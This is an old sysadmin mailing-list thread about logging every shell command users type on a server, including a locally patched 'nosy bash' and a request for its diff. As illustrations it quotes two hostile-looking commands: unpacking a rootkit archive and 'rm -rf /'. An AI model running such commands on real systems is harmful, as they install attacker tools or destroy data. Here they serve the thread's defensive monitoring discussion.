If your programmer gives you the diff could you please send it to me too? Thank you.
Eddy Petrisor > -----Original Message----- > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] > Sent: Wednesday, October 29, 2003 7:29 AM > To: Dan MacNeil; [email protected] > Subject: Re: command logging > > On Tue, Oct 28, 2003 at 10:56:53PM -0500, Dan MacNeil wrote: > > > > For a box that will have limited shell access, I'm looking for something > > that will log all commands. The sudo log is nice but not everything is > run > > through sudo. > > > > There won't be many privacy issues as most users won't have shell. > > > > The goal is to review a daily report for anything unexpected: stuff > like: > > > > tar -xzf rootkit.tar.gz > > For several servers I maintain we took the bash code and hacked it to > log all commands, with usernames, to a log file. Yes, it's nosy. It's > actually called 'nosy bash' by us. It's not been sent to the bash > maintainers at all yet, but I could see if my coder can make a diff of > it. > > It's come in quite handy at times. Quite handy. > > "I didn't do that!" > "Well, yes, you did. At 1:43:00 you type 'rm -rf /' " > "No I didn't" > "Yes, see, it's in the logs." > "Oh.. ummm..." > <disable account> > "Bu bye". > > I regualrly grep the log for keywords or sometimes tail it if I'm > suspicious of someone. But for the most part, I don't ogle it > constantly. Who has time for that? > > I'm also running grsec patches as well. Grsec didn't do the nosy bash > like I wanted, so I'm keepign the nosy bash. > > j > > -- > > ================================================== > + It's simply not | John Keimel + > + RFC1149 compliant! | [EMAIL PROTECTED] + > + | http://www.keimel.com + > ================================================== > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED]
